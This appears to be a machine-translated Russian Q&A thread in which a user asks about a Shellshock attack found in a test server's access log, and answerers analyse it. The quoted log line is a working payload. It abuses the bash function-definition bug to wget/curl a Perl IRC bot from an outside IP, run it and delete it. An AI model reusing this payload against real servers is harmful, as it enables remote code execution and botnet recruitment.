Увидел это в access.log
на моем тестовом сервере:
> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Ни одно из адресов не имеет отношения ко мне или нашему диапазону IP-адресов (или что-то еще в этом отношении), немедленно подумав об ошибке безопасности Shellshock / "bashdoor".
Фактически, похоже, что кто-то пытался curl
«что-то» спуститься на сервер, затем выполнил это «что-то» и после этого удалил «что-то» с помощью -rf
.
Это чистый тестовый сервер, никакого вреда не будет (== никакого вреда не может быть, кроме переустановки) - но выбор времени очень интересен. Я не видел ничего подобного раньше, насколько я помню.
Должен ли я беспокоиться, например, быть «заинтересованным»? У кого-нибудь есть идеи о том, что это?
security
shell-script
webserver
davidkonrad
источник
источник
Ответы:
Это кто-то, кто использует ошибку Shellshock. Можете ли вы определить, что делал Perl-скрипт? Это определенно стоит того Второй используемый URL-адрес возвращает 404, но
http://213.5.67.223/ji
существует и может быть тем же самым, учитывая, что это скрипт на Perl. Кажется, это какой-то IRC-сервер, поэтому подключение к тестовому серверу с помощью IRC-клиента может оказаться интересным. РЕДАКТИРОВАТЬ: Комментарий исправил меня, это клиент, так способный на вас шпионить.Также проверьте, запущен ли скрипт perl.
источник
ps -ax | grep perl
илиps ax | grep perl
ps -ef
я могу видеть, что есть/usr/sbin/apache2 -k start
с точно такой же отметкой времени :( Так что я думаю, атака прошла успешно. Обновил bash сsudo apt-get update && sudo apt-get install --only-upgrade bash
shell
Меня беспокоит следующая строка в программе: my @ resp =$comando 2>&1 3>&1
; Насколько я могу судить, вреда нет.Уязвимость Shellshock используется для загрузки (использования
wget
) и выполнения вредоносного сценария Perl. Эта атака является очень простой и требует установки Perl и wget (при условии, что один из них не установлен, и вы уверены, что других попыток взлома не было, ваш сервер не был взломан).Сам скрипт является базовым IRC-ботом script-kiddie, однажды выполненный, когда дерьмо подключается к IRC-серверу и ожидает команды, похоже, что в нем есть возможности поиска Google, скорее всего, он автоматически ищет уязвимые хосты и пытается их использовать. Помимо этого у вас, конечно, есть базовый арсенал заноса, который представляет собой HTTP-флуд, TCP и UDP-флуд и доступ к оболочке (как пользователь, который запустил скрипт, который будет пользователем, под которым работает HTTP-сервер).
источник
Как уже упоминалось другими, это попытка сценария-обманщика использовать уязвимость bash для запуска IRC-бота на основе Perl-сценария. Если вы обновили bash , и, кроме того, если вы запускаете apache под chroot, как вам, вам не о чем беспокоиться. Я вижу несколько версий этого в моем журнале (см. Ниже), по крайней мере, через день с 27.09. Это просто шум.
Еще одну разновидность попытки выполнения скрипта (сценария python), которую я только что заметил сегодня ... ПРИМЕЧАНИЕ: google-traffic-analytics.com, куда загружается скрипт python, конечно, не имеет ничего общего с Google.
источник